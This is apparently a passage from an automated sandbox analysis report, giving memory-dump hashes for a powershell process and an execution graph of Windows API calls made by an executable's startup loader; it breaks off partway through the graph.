                                                                                                      • Instruction ID: a75f1b03a4f9ddd125ad80b3b81e7da06db0f8611167ff013f63c7ba033e522a
                                                                                                      • Opcode Fuzzy Hash: 8039378a77a411baff7ca7282f82005bfb2cb2162a065350f1ceb69a0cf8d469
                                                                                                      • Instruction Fuzzy Hash: 76F0BE32B0C5048FD769EA5CE4558E873E0EF4532075100FAE16DCB1A7CA2AEC80C749
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1981086858.00007FFD98C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98c90000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3275b9812b86598477c44b8d1d33dd52ad9783eaf1c968f3ca101778e3bd5f07
                                                                                                      • Instruction ID: 06dba775916c7c9ac347347d1e8e9007e481cf96ff11cad55151172a04b936e4
                                                                                                      • Opcode Fuzzy Hash: 3275b9812b86598477c44b8d1d33dd52ad9783eaf1c968f3ca101778e3bd5f07
                                                                                                      • Instruction Fuzzy Hash: 90F0E232B0C5088FDB65EB5CE0558A877E0EF4632074100F6E15DCB5A7CA26EC40CB45
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.1980655971.00007FFD98BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ffd98bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: M_^$M_^$M_^$M_^$M_^$M_^
                                                                                                      • API String ID: 0-1070628180
                                                                                                      • Opcode ID: bc54dc010b075392547784a64b31ea86aef451bdea881493af72a3a50abdf46e
                                                                                                      • Instruction ID: fa7018a758ea0ce364ef8823b296904a2699581e98f4c9f5f362645bffaf10a5
                                                                                                      • Opcode Fuzzy Hash: bc54dc010b075392547784a64b31ea86aef451bdea881493af72a3a50abdf46e
                                                                                                      • Instruction Fuzzy Hash: C781D452B0E6C24FE763666D58750D47FA0EF53A1879E11F7D0D9CA0D3E849280AC3A6

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:9.6%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:25
                                                                                                      execution_graph 16416 7ff75713cc3c 16437 7ff75713ce0c 16416->16437 16419 7ff75713cd88 16591 7ff75713d12c IsProcessorFeaturePresent 16419->16591 16420 7ff75713cc58 __scrt_acquire_startup_lock 16422 7ff75713cd92 16420->16422 16428 7ff75713cc76 __scrt_release_startup_lock 16420->16428 16423 7ff75713d12c 7 API calls 16422->16423 16425 7ff75713cd9d __GetCurrentState 16423->16425 16424 7ff75713cc9b 16426 7ff75713cd21 16443 7ff75713d274 16426->16443 16428->16424 16428->16426 16580 7ff757149b2c 16428->16580 16429 7ff75713cd26 16446 7ff757131000 16429->16446 16434 7ff75713cd49 16434->16425 16587 7ff75713cf90 16434->16587 16438 7ff75713ce14 16437->16438 16439 7ff75713ce20 __scrt_dllmain_crt_thread_attach 16438->16439 16440 7ff75713cc50 16439->16440 16441 7ff75713ce2d 16439->16441 16440->16419 16440->16420 16441->16440 16598 7ff75713d888 16441->16598 16444 7ff75715a4d0 __scrt_get_show_window_mode 16443->16444 16445 7ff75713d28b GetStartupInfoW 16444->16445 16445->16429 16447 7ff757131009 16446->16447 16625 7ff757145484 16447->16625 16449 7ff7571337fb 16632 7ff7571336b0 16449->16632 16454 7ff75713c550 _log10_special 8 API calls 16457 7ff757133ca7 16454->16457 16455 7ff75713391b 16801 7ff7571345c0 16455->16801 16456 7ff75713383c 16792 7ff757131c80 16456->16792 16585 7ff75713d2b8 GetModuleHandleW 16457->16585 16460 7ff75713385b 16704 7ff757138830 16460->16704 16463 7ff75713396a 16824 7ff757132710 16463->16824 16465 7ff75713388e 16474 7ff7571338bb __std_exception_destroy 16465->16474 16796 7ff7571389a0 16465->16796 16467 7ff757133808 __std_exception_destroy 16467->16454 16468 7ff75713395d 16469 7ff757133962 16468->16469 16470 7ff757133984 16468->16470 16820 7ff75714004c 16469->16820 16472 7ff757131c80 49 API calls 16470->16472 16475 7ff7571339a3 16472->16475 16476 7ff757138830 14 API calls 16474->16476 16483 7ff7571338de __std_exception_destroy 16474->16483 16480 7ff757131950 115 API calls 16475->16480 16476->16483 16478 7ff757133a0b 16479 7ff7571389a0 40 API calls 16478->16479 16481 7ff757133a17 16479->16481 16482 7ff7571339ce 16480->16482 16484 7ff7571389a0 40 API calls 16481->16484 16482->16460 16485 7ff7571339de 16482->16485 16489 7ff75713390e __std_exception_destroy 16483->16489 16835 7ff757138940 16483->16835 16486 7ff757133a23 16484->16486 16487 7ff757132710 54 API calls 16485->16487 16488 7ff7571389a0 40 API calls 16486->16488 16487->16467 16488->16489 16490 7ff757138830 14 API calls 16489->16490 16491 7ff757133a3b 16490->16491 16492 7ff757133b2f 16491->16492 16493 7ff757133a60 __std_exception_destroy 16491->16493 16494 7ff757132710 54 API calls 16492->16494 16495 7ff757138940 40 API calls 16493->16495 16506 7ff757133aab 16493->16506 16494->16467 16495->16506 16496 7ff757138830 14 API calls 16497 7ff757133bf4 __std_exception_destroy 16496->16497 16498 7ff757133d41 16497->16498 16499 7ff757133c46 16497->16499 16842 7ff7571344e0 16498->16842 16500 7ff757133c50 16499->16500 16501 7ff757133cd4 16499->16501 16717 7ff7571390e0 16500->16717 16504 7ff757138830 14 API calls 16501->16504 16508 7ff757133ce0 16504->16508 16505 7ff757133d4f 16509 7ff757133d71 16505->16509 16510 7ff757133d65 16505->16510 16506->16496 16511 7ff757133c61 16508->16511 16514 7ff757133ced 16508->16514 16513 7ff757131c80 49 API calls 16509->16513 16845 7ff757134630 16510->16845 16516 7ff757132710 54 API calls 16511->16516 16523 7ff757133cc8 __std_exception_destroy 16513->16523 16517 7ff757131c80 49 API calls 16514->16517 16516->16467 16520 7ff757133d0b 16517->16520 16518 7ff757133dc4 16767 7ff757139390 16518->16767 16520->16523 16524 7ff757133d12 16520->16524 16522 7ff757133dd7 SetDllDirectoryW 16528 7ff757133e0a 16522->16528 16570 7ff757133e5a 16522->16570 16523->16518 16525 7ff757133da7 SetDllDirectoryW LoadLibraryExW 16523->16525 16527 7ff757132710 54 API calls 16524->16527 16525->16518 16527->16467 16529 7ff757138830 14 API calls 16528->16529 16537 7ff757133e16 __std_exception_destroy 16529->16537 16530 7ff757134008 16532 7ff757134012 PostMessageW GetMessageW 16530->16532 16533 7ff757134035 16530->16533 16531 7ff757133f1b 16772 7ff7571333c0 16531->16772 16532->16533 16922 7ff757133360 16533->16922 16540 7ff757133ef2 16537->16540 16544 7ff757133e4e 16537->16544 16543 7ff757138940 40 API calls 16540->16543 16543->16570 16544->16570 16848 7ff757136dc0 16544->16848 16549 7ff757136fc0 FreeLibrary 16552 7ff75713405b 16549->16552 16557 7ff757133e81 16560 7ff757133ea2 16557->16560 16571 7ff757133e85 16557->16571 16869 7ff757136e00 16557->16869 16560->16571 16888 7ff7571371b0 16560->16888 16570->16530 16570->16531 16571->16570 16904 7ff757132a50 16571->16904 16581 7ff757149b43 16580->16581 16582 7ff757149b64 16580->16582 16581->16426 18887 7ff75714a3d8 16582->18887 16586 7ff75713d2c9 16585->16586 16586->16434 16589 7ff75713cfa1 16587->16589 16588 7ff75713cd60 16588->16424 16589->16588 16590 7ff75713d888 7 API calls 16589->16590 16590->16588 16592 7ff75713d152 _isindst __scrt_get_show_window_mode 16591->16592 16593 7ff75713d171 RtlCaptureContext RtlLookupFunctionEntry 16592->16593 16594 7ff75713d19a RtlVirtualUnwind 16593->16594 16595 7ff75713d1d6 __scrt_get_show_window_mode 16593->16595 16594->16595 16596 7ff75713d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16595->16596 16597 7ff75713d256 _isindst 16596->16597 16597->16422 16599 7ff75713d89a 16598->16599 16600 7ff75713d890 16598->16600 16599->16440 16604 7ff75713dc24 16600->16604 16605 7ff75713d895 16604->16605 16606 7ff75713dc33 16604->16606 16608 7ff75713dc90 16605->16608 16612 7ff75713de60 16606->16612 16609 7ff75713dcbb 16608->16609 16610 7ff75713dc9e DeleteCriticalSection 16609->16610 16611 7ff75713dcbf 16609->16611 16610->16609 16611->16599 16616 7ff75713dcc8 16612->16616 16617 7ff75713ddb2 TlsFree 16616->16617 16619 7ff75713dd0c __vcrt_InitializeCriticalSectionEx 16616->16619 16618 7ff75713dd3a LoadLibraryExW 16621 7ff75713ddd9 16618->16621 16622 7ff75713dd5b GetLastError 16618->16622 16619->16617 16619->16618 16620 7ff75713ddf9 GetProcAddress 16619->16620 16624 7ff75713dd7d LoadLibraryExW 16619->16624 16620->16617 16621->16620 16623 7ff75713ddf0 FreeLibrary 16621->16623 16622->16619 16623->16620 16624->16619 16624->16621 16628 7ff75714f480 16625->16628 16626 7ff75714f4d3 16627 7ff75714a814 _invalid_parameter_noinfo 37 API calls 16626->16627 16631 7ff75714f4fc 16627->16631 16628->16626 16629 7ff75714f526 16628->16629 16935 7ff75714f358 16629->16935 16631->16449 16943 7ff75713c850 16632->16943 16635 7ff7571336eb GetLastError 16950 7ff757132c50 16635->16950 16636 7ff757133710 16945 7ff757139280 FindFirstFileExW 16636->16945 16639 7ff757133706 16644 7ff75713c550 _log10_special 8 API calls 16639->16644 16641 7ff75713377d 16976 7ff757139440 16641->16976 16642 7ff757133723 16965 7ff757139300 CreateFileW 16642->16965 16647 7ff7571337b5 16644->16647 16646 7ff75713378b 16646->16639 16651 7ff757132810 49 API calls 16646->16651 16647->16467 16654 7ff757131950 16647->16654 16649 7ff75713374c __vcrt_InitializeCriticalSectionEx 16649->16641 16650 7ff757133734 16968 7ff757132810 16650->16968 16651->16639 16655 7ff7571345c0 108 API calls 16654->16655 16656 7ff757131985 16655->16656 16657 7ff757131c43 16656->16657 16658 7ff757137f90 83 API calls 16656->16658 16659 7ff75713c550 _log10_special 8 API calls 16657->16659 16660 7ff7571319cb 16658->16660 16661 7ff757131c5e 16659->16661 16703 7ff757131a03 16660->16703 17340 7ff7571406d4 16660->17340 16661->16455 16661->16456 16663 7ff75714004c 74 API calls 16663->16657 16664 7ff7571319e5 16665 7ff7571319e9 16664->16665 16666 7ff757131a08 16664->16666 16668 7ff757144f08 _get_daylight 11 API calls 16665->16668 17344 7ff75714039c 16666->17344 16670 7ff7571319ee 16668->16670 17347 7ff757132910 16670->17347 16671 7ff757131a45 16677 7ff757131a7b 16671->16677 16678 7ff757131a5c 16671->16678 16672 7ff757131a26 16674 7ff757144f08 _get_daylight 11 API calls 16672->16674 16675 7ff757131a2b 16674->16675 16676 7ff757132910 54 API calls 16675->16676 16676->16703 16679 7ff757131c80 49 API calls 16677->16679 16680 7ff757144f08 _get_daylight 11 API calls 16678->16680 16681 7ff757131a92 16679->16681 16682 7ff757131a61 16680->16682 16683 7ff757131c80 49 API calls 16681->16683 16684 7ff757132910 54 API calls 16682->16684 16685 7ff757131add 16683->16685 16684->16703 16686 7ff7571406d4 73 API calls 16685->16686 16687 7ff757131b01 16686->16687 16688 7ff757131b35 16687->16688 16689 7ff757131b16 16687->16689 16691 7ff75714039c _fread_nolock 53 API calls 16688->16691 16690 7ff757144f08 _get_daylight 11 API calls 16689->16690 16693 7ff757131b1b 16690->16693 16692 7ff757131b4a 16691->16692 16694 7ff757131b6f 16692->16694 16695 7ff757131b50 16692->16695 16696 7ff757132910 54 API calls 16693->16696 17362 7ff757140110 16694->17362 16697 7ff757144f08 _get_daylight 11 API calls 16695->16697 16696->16703 16699 7ff757131b55 16697->16699 16701 7ff757132910 54 API calls 16699->16701 16701->16703 16702 7ff757132710 54 API calls 16702->16703 16703->16663 16705 7ff75713883a 16704->16705 16706 7ff757139390 2 API calls 16705->16706 16707 7ff757138859 GetEnvironmentVariableW 16706->16707 16708 7ff7571388c2 16707->16708 16709 7ff757138876 ExpandEnvironmentStringsW 16707->16709 16710 7ff75713c550 _log10_special 8 API calls 16708->16710 16709->16708 16711 7ff757138898 16709->16711 16712 7ff7571388d4 16710->16712 16713 7ff757139440 2 API calls 16711->16713 16712->16465 16714 7ff7571388aa 16713->16714 16715 7ff75713c550 _log10_special 8 API calls 16714->16715 16716 7ff7571388ba 16715->16716 16716->16465 16718 7ff7571390f5 16717->16718 17580 7ff757138570 GetCurrentProcess OpenProcessToken 16718->17580 16721 7ff757138570 7 API calls 16722 7ff757139121 16721->16722 16723 7ff75713913a 16722->16723 16724 7ff757139154 16722->16724 16725 7ff7571326b0 48 API calls 16723->16725 16726 7ff7571326b0 48 API calls 16724->16726 16727 7ff757139152 16725->16727 16728 7ff757139167 LocalFree LocalFree 16726->16728 16727->16728 16729 7ff757139183 16728->16729 16732 7ff75713918f 16728->16732 17590 7ff757132b50 16729->17590 16731 7ff75713c550 _log10_special 8 API calls 16733 7ff757133c55 16731->16733 16732->16731 16733->16511 16734 7ff757138660 16733->16734 16735 7ff757138678 16734->16735 16736 7ff7571386fa GetTempPathW GetCurrentProcessId 16735->16736 16737 7ff75713869c 16735->16737 17599 7ff7571325c0 16736->17599 16739 7ff757138830 14 API calls 16737->16739 16740 7ff7571386a8 16739->16740 17606 7ff7571381d0 16740->17606 16745 7ff7571386e8 __std_exception_destroy 16766 7ff7571387d4 __std_exception_destroy 16745->16766 16746 7ff757138728 __std_exception_destroy 16753 7ff757138765 __std_exception_destroy 16746->16753 17603 7ff757148b68 16746->17603 16749 7ff7571386ce __std_exception_destroy 16749->16736 16756 7ff7571386dc 16749->16756 16752 7ff75713c550 _log10_special 8 API calls 16755 7ff757133cbb 16752->16755 16758 7ff757139390 2 API calls 16753->16758 16753->16766 16755->16511 16755->16523 16757 7ff757132810 49 API calls 16756->16757 16757->16745 16759 7ff7571387b1 16758->16759 16760 7ff7571387e9 16759->16760 16761 7ff7571387b6 16759->16761 16762 7ff757148238 38 API calls 16760->16762 16763 7ff757139390 2 API calls 16761->16763 16762->16766 16764 7ff7571387c6 16763->16764 16765 7ff757148238 38 API calls 16764->16765 16765->16766 16766->16752 16768 7ff7571393b2 MultiByteToWideChar 16767->16768 16770 7ff7571393d6 16767->16770 16768->16770 16771 7ff7571393ec __std_exception_destroy 16768->16771 16769 7ff7571393f3 MultiByteToWideChar 16769->16771 16770->16769 16770->16771 16771->16522 16777 7ff7571333ce __scrt_get_show_window_mode 16772->16777 16773 7ff7571335c7 16774 7ff75713c550 _log10_special 8 API calls 16773->16774 16775 7ff757133664 16774->16775 16775->16467 16791 7ff7571390c0 LocalFree 16775->16791 16777->16773 16778 7ff757131c80 49 API calls 16777->16778 16780 7ff7571335e2 16777->16780 16784 7ff7571335c9 16777->16784 16785 7ff757132a50 54 API calls 16777->16785 16789 7ff7571335d0 16777->16789 17795 7ff757134560 16777->17795 17801 7ff757137e20 16777->17801 17812 7ff757131600 16777->17812 17860 7ff757137120 16777->17860 17864 7ff757134190 16777->17864 17908 7ff757134450 16777->17908 16778->16777 16781 7ff757132710 54 API calls 16780->16781 16781->16773 16786 7ff757132710 54 API calls 16784->16786 16785->16777 16786->16773 16790 7ff757132710 54 API calls 16789->16790 16790->16773 16793 7ff757131ca5 16792->16793 16794 7ff757144984 49 API calls 16793->16794 16795 7ff757131cc8 16794->16795 16795->16460 16797 7ff757139390 2 API calls 16796->16797 16798 7ff7571389b4 16797->16798 16799 7ff757148238 38 API calls 16798->16799 16800 7ff7571389c6 __std_exception_destroy 16799->16800 16800->16474 16802 7ff7571345cc 16801->16802 16803 7ff757139390 2 API calls 16802->16803 16804 7ff7571345f4 16803->16804 16805 7ff757139390 2 API calls 16804->16805 16806 7ff757134607 16805->16806 18075 7ff757145f94 16806->18075 16809 7ff75713c550 _log10_special 8 API calls 16810 7ff75713392b 16809->16810 16810->16463 16811 7ff757137f90 16810->16811 16812 7ff757137fb4 16811->16812 16813 7ff7571406d4 73 API calls 16812->16813 16816 7ff75713808b __std_exception_destroy 16812->16816 16814 7ff757137fd0 16813->16814 16814->16816 18466 7ff7571478c8 16814->18466 16816->16468 16817 7ff7571406d4 73 API calls 16819 7ff757137fe5 16817->16819 16818 7ff75714039c _fread_nolock 53 API calls 16818->16819 16819->16816 16819->16817 16819->16818 16821 7ff75714007c 16820->16821 18481 7ff75713fe28 16821->18481 16823 7ff757140095 16823->16463 16825 7ff75713c850 16824->16825 16826 7ff757132734 GetCurrentProcessId 16825->16826 16827 7ff757131c80 49 API calls 16826->16827 16828 7ff757132787 16827->16828 16829 7ff757144984 49 API calls 16828->16829 16830 7ff7571327cf 16829->16830 16831 7ff757132620 12 API calls 16830->16831 16832 7ff7571327f1 16831->16832 16833 7ff75713c550 _log10_special 8 API calls 16832->16833 16834 7ff757132801 16833->16834 16834->16467 16836 7ff757139390 2 API calls 16835->16836 16837 7ff75713895c 16836->16837 16838 7ff757139390 2 API calls 16837->16838 16839 7ff75713896c 16838->16839 16840 7ff757148238 38 API calls 16839->16840 16841 7ff75713897a __std_exception_destroy 16840->16841 16841->16478 16843 7ff757131c80 49 API calls 16842->16843 16844 7ff7571344fd 16843->16844 16844->16505 16846 7ff757131c80 49 API calls 16845->16846 16847 7ff757134660 16846->16847 16847->16523 16849 7ff757136dd5 16848->16849 16850 7ff757144f08 _get_daylight 11 API calls 16849->16850 16853 7ff757133e6c 16849->16853 16851 7ff757136de2 16850->16851 16852 7ff757132910 54 API calls 16851->16852 16852->16853 16854 7ff757137340 16853->16854 18492 7ff757131470 16854->18492 16856 7ff757137368 16857 7ff757134630 49 API calls 16856->16857 16867 7ff7571374b9 __std_exception_destroy 16856->16867 16858 7ff75713738a 16857->16858 16859 7ff75713738f 16858->16859 16860 7ff757134630 49 API calls 16858->16860 16861 7ff757132a50 54 API calls 16859->16861 16862 7ff7571373ae 16860->16862 16861->16867 16862->16859 16863 7ff757134630 49 API calls 16862->16863 16864 7ff7571373ca 16863->16864 16864->16859 16865 7ff7571373d3 16864->16865 16866 7ff757132710 54 API calls 16865->16866 16868 7ff757137443 __std_exception_destroy memcpy_s 16865->16868 16866->16867 16867->16557 16868->16557 16885 7ff757136e1c 16869->16885 16870 7ff757136f3f 16871 7ff75713c550 _log10_special 8 API calls 16870->16871 16873 7ff757136f51 16871->16873 16872 7ff757131840 45 API calls 16872->16885 16873->16560 16874 7ff757136faa 16876 7ff757132710 54 API calls 16874->16876 16875 7ff757131c80 49 API calls 16875->16885 16876->16870 16877 7ff757136f97 16878 7ff757132710 54 API calls 16877->16878 16878->16870 16879 7ff757134560 10 API calls 16879->16885 16880 7ff757137e20 52 API calls 16880->16885 16881 7ff757132a50 54 API calls 16881->16885 16882 7ff757136f84 16883 7ff757132710 54 API calls 16882->16883 16883->16870 16884 7ff757131600 118 API calls 16884->16885 16885->16870 16885->16872 16885->16874 16885->16875 16885->16877 16885->16879 16885->16880 16885->16881 16885->16882 16885->16884 16886 7ff757136f6d 16885->16886 16887 7ff757132710 54 API calls 16886->16887 16887->16870 18522 7ff757138e80 16888->18522 16890 7ff7571371c9 16891 7ff757138e80 3 API calls 16890->16891 16905 7ff75713c850 16904->16905 16906 7ff757132a74 GetCurrentProcessId 16905->16906 16907 7ff757131c80 49 API calls 16906->16907 16908 7ff757132ac7 16907->16908 16909 7ff757144984 49 API calls 16908->16909 16910 7ff757132b0f 16909->16910 16911 7ff757132620 12 API calls 16910->16911 18598 7ff757136360 16922->18598 16926 7ff757133381 16930 7ff757133399 16926->16930 18666 7ff757136050 16926->18666 16931 7ff757133670 16930->16931 16932 7ff75713367e 16931->16932 16934 7ff75713368f 16932->16934 18886 7ff757138e60 FreeLibrary 16932->18886 16934->16549 16942 7ff75714546c EnterCriticalSection 16935->16942 16944 7ff7571336bc GetModuleFileNameW 16943->16944 16944->16635 16944->16636 16946 7ff7571392d2 16945->16946 16947 7ff7571392bf FindClose 16945->16947 16948 7ff75713c550 _log10_special 8 API calls 16946->16948 16947->16946 16949 7ff75713371a 16948->16949 16949->16641 16949->16642 16951 7ff75713c850 16950->16951 16952 7ff757132c70 GetCurrentProcessId 16951->16952 16981 7ff7571326b0 16952->16981 16954 7ff757132cb9 16985 7ff757144bd8 16954->16985 16957 7ff7571326b0 48 API calls 16958 7ff757132d34 FormatMessageW 16957->16958 16960 7ff757132d6d 16958->16960 16961 7ff757132d7f MessageBoxW 16958->16961 16962 7ff7571326b0 48 API calls 16960->16962 16963 7ff75713c550 _log10_special 8 API calls 16961->16963 16962->16961 16964 7ff757132daf 16963->16964 16964->16639 16966 7ff757133730 16965->16966 16967 7ff757139340 GetFinalPathNameByHandleW CloseHandle 16965->16967 16966->16649 16966->16650 16967->16966 16969 7ff757132834 16968->16969 16970 7ff7571326b0 48 API calls 16969->16970 16971 7ff757132887 16970->16971 16972 7ff757144bd8 48 API calls 16971->16972 16973 7ff7571328d0 MessageBoxW 16972->16973 16974 7ff75713c550 _log10_special 8 API calls 16973->16974 16975 7ff757132900 16974->16975 16975->16639 16977 7ff75713946a WideCharToMultiByte 16976->16977 16980 7ff757139495 16976->16980 16978 7ff7571394ab __std_exception_destroy 16977->16978 16977->16980 16978->16646 16979 7ff7571394b2 WideCharToMultiByte 16979->16978 16980->16978 16980->16979 16982 7ff7571326d5 16981->16982 16983 7ff757144bd8 48 API calls 16982->16983 16984 7ff7571326f8 16983->16984 16984->16954 16988 7ff757144c32 16985->16988 16986 7ff757144c57 16987 7ff75714a814 _invalid_parameter_noinfo 37 API calls 16986->16987 16991 7ff757144c81 16987->16991 16988->16986 16989 7ff757144c93 16988->16989 17003 7ff757142f90 16989->17003 16993 7ff75713c550 _log10_special 8 API calls 16991->16993 16992 7ff757144d40 16998 7ff757144d74 16992->16998 17002 7ff757144d49 16992->17002 16995 7ff757132d04 16993->16995 16994 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16994->16991 16995->16957 16997 7ff757144d9a 16997->16998 16999 7ff757144da4 16997->16999 16998->16994 17001 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16999->17001 17000 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17000->16991 17001->16991 17002->17000 17004 7ff757142fce 17003->17004 17005 7ff757142fbe 17003->17005 17006 7ff757142fd7 17004->17006 17011 7ff757143005 17004->17011 17007 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17005->17007 17008 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17006->17008 17009 7ff757142ffd 17007->17009 17008->17009 17009->16992 17009->16997 17009->16998 17009->17002 17011->17005 17011->17009 17014 7ff7571439a4 17011->17014 17047 7ff7571433f0 17011->17047 17084 7ff757142b80 17011->17084 17015 7ff757143a57 17014->17015 17016 7ff7571439e6 17014->17016 17017 7ff757143a5c 17015->17017 17018 7ff757143ab0 17015->17018 17019 7ff7571439ec 17016->17019 17020 7ff757143a81 17016->17020 17021 7ff757143a5e 17017->17021 17022 7ff757143a91 17017->17022 17026 7ff757143aba 17018->17026 17027 7ff757143ac7 17018->17027 17032 7ff757143abf 17018->17032 17023 7ff7571439f1 17019->17023 17024 7ff757143a20 17019->17024 17107 7ff757141d54 17020->17107 17025 7ff757143a00 17021->17025 17035 7ff757143a6d 17021->17035 17114 7ff757141944 17022->17114 17023->17027 17029 7ff7571439f7 17023->17029 17024->17029 17024->17032 17045 7ff757143af0 17025->17045 17087 7ff757144158 17025->17087 17026->17020 17026->17032 17121 7ff7571446ac 17027->17121 17029->17025 17034 7ff757143a32 17029->17034 17043 7ff757143a1b 17029->17043 17032->17045 17125 7ff757142164 17032->17125 17034->17045 17097 7ff757144494 17034->17097 17035->17020 17037 7ff757143a72 17035->17037 17037->17045 17103 7ff757144558 17037->17103 17039 7ff75713c550 _log10_special 8 API calls 17040 7ff757143dea 17039->17040 17040->17011 17043->17045 17046 7ff757143cdc 17043->17046 17132 7ff7571447c0 17043->17132 17045->17039 17046->17045 17138 7ff75714ea08 17046->17138 17048 7ff7571433fe 17047->17048 17049 7ff757143414 17047->17049 17050 7ff757143454 17048->17050 17051 7ff757143a57 17048->17051 17052 7ff7571439e6 17048->17052 17049->17050 17053 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17049->17053 17050->17011 17054 7ff757143a5c 17051->17054 17055 7ff757143ab0 17051->17055 17056 7ff7571439ec 17052->17056 17057 7ff757143a81 17052->17057 17053->17050 17058 7ff757143a5e 17054->17058 17059 7ff757143a91 17054->17059 17063 7ff757143aba 17055->17063 17064 7ff757143ac7 17055->17064 17069 7ff757143abf 17055->17069 17060 7ff7571439f1 17056->17060 17061 7ff757143a20 17056->17061 17065 7ff757141d54 38 API calls 17057->17065 17062 7ff757143a00 17058->17062 17071 7ff757143a6d 17058->17071 17067 7ff757141944 38 API calls 17059->17067 17060->17064 17066 7ff7571439f7 17060->17066 17061->17066 17061->17069 17068 7ff757144158 47 API calls 17062->17068 17082 7ff757143af0 17062->17082 17063->17057 17063->17069 17070 7ff7571446ac 45 API calls 17064->17070 17079 7ff757143a1b 17065->17079 17066->17062 17072 7ff757143a32 17066->17072 17066->17079 17067->17079 17068->17079 17073 7ff757142164 38 API calls 17069->17073 17069->17082 17070->17079 17071->17057 17074 7ff757143a72 17071->17074 17075 7ff757144494 46 API calls 17072->17075 17072->17082 17073->17079 17077 7ff757144558 37 API calls 17074->17077 17074->17082 17075->17079 17076 7ff75713c550 _log10_special 8 API calls 17078 7ff757143dea 17076->17078 17077->17079 17078->17011 17080 7ff7571447c0 45 API calls 17079->17080 17079->17082 17083 7ff757143cdc 17079->17083 17080->17083 17081 7ff75714ea08 46 API calls 17081->17083 17082->17076 17083->17081 17083->17082 17323 7ff757140fc8 17084->17323 17088 7ff75714417e 17087->17088 17150 7ff757140b80 17088->17150 17093 7ff7571447c0 45 API calls 17095 7ff7571442c3 17093->17095 17094 7ff7571447c0 45 API calls 17096 7ff757144351 17094->17096 17095->17094 17095->17095 17095->17096 17096->17043 17099 7ff7571444c9 17097->17099 17098 7ff7571444e7 17101 7ff75714ea08 46 API calls 17098->17101 17099->17098 17100 7ff7571447c0 45 API calls 17099->17100 17102 7ff75714450e 17099->17102 17100->17098 17101->17102 17102->17043 17105 7ff757144579 17103->17105 17104 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17106 7ff7571445aa 17104->17106 17105->17104 17105->17106 17106->17043 17108 7ff757141d87 17107->17108 17109 7ff757141db6 17108->17109 17111 7ff757141e73 17108->17111 17113 7ff757141df3 17109->17113 17293 7ff757140c28 17109->17293 17112 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17111->17112 17112->17113 17113->17043 17115 7ff757141977 17114->17115 17116 7ff7571419a6 17115->17116 17118 7ff757141a63 17115->17118 17117 7ff757140c28 12 API calls 17116->17117 17120 7ff7571419e3 17116->17120 17117->17120 17119 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17118->17119 17119->17120 17120->17043 17122 7ff7571446ef 17121->17122 17124 7ff7571446f3 __crtLCMapStringW 17122->17124 17301 7ff757144748 17122->17301 17124->17043 17126 7ff757142197 17125->17126 17127 7ff7571421c6 17126->17127 17129 7ff757142283 17126->17129 17128 7ff757140c28 12 API calls 17127->17128 17131 7ff757142203 17127->17131 17128->17131 17130 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17129->17130 17130->17131 17131->17043 17133 7ff7571447d7 17132->17133 17305 7ff75714d9b8 17133->17305 17139 7ff75714ea39 17138->17139 17148 7ff75714ea47 17138->17148 17140 7ff75714ea67 17139->17140 17141 7ff7571447c0 45 API calls 17139->17141 17139->17148 17142 7ff75714ea78 17140->17142 17143 7ff75714ea9f 17140->17143 17141->17140 17313 7ff7571500a0 17142->17313 17145 7ff75714eac9 17143->17145 17146 7ff75714eb2a 17143->17146 17143->17148 17145->17148 17316 7ff75714f8a0 17145->17316 17147 7ff75714f8a0 _fread_nolock MultiByteToWideChar 17146->17147 17147->17148 17148->17046 17151 7ff757140ba6 17150->17151 17152 7ff757140bb7 17150->17152 17158 7ff75714e570 17151->17158 17152->17151 17180 7ff75714d5fc 17152->17180 17155 7ff757140bf8 17157 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17155->17157 17156 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17156->17155 17157->17151 17159 7ff75714e58d 17158->17159 17160 7ff75714e5c0 17158->17160 17161 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17159->17161 17160->17159 17162 7ff75714e5f2 17160->17162 17170 7ff7571442a1 17161->17170 17168 7ff75714e705 17162->17168 17175 7ff75714e63a 17162->17175 17163 7ff75714e7f7 17220 7ff75714da5c 17163->17220 17165 7ff75714e7bd 17213 7ff75714ddf4 17165->17213 17167 7ff75714e78c 17206 7ff75714e0d4 17167->17206 17168->17163 17168->17165 17168->17167 17169 7ff75714e74f 17168->17169 17172 7ff75714e745 17168->17172 17196 7ff75714e304 17169->17196 17170->17093 17170->17095 17172->17165 17174 7ff75714e74a 17172->17174 17174->17167 17174->17169 17175->17170 17187 7ff75714a4a4 17175->17187 17178 7ff75714a900 _isindst 17 API calls 17179 7ff75714e854 17178->17179 17181 7ff75714d60b _get_daylight 17180->17181 17182 7ff75714d647 17180->17182 17181->17182 17184 7ff75714d62e HeapAlloc 17181->17184 17186 7ff757153590 _get_daylight 2 API calls 17181->17186 17183 7ff757144f08 _get_daylight 11 API calls 17182->17183 17185 7ff757140be4 17183->17185 17184->17181 17184->17185 17185->17155 17185->17156 17186->17181 17188 7ff75714a4bb 17187->17188 17189 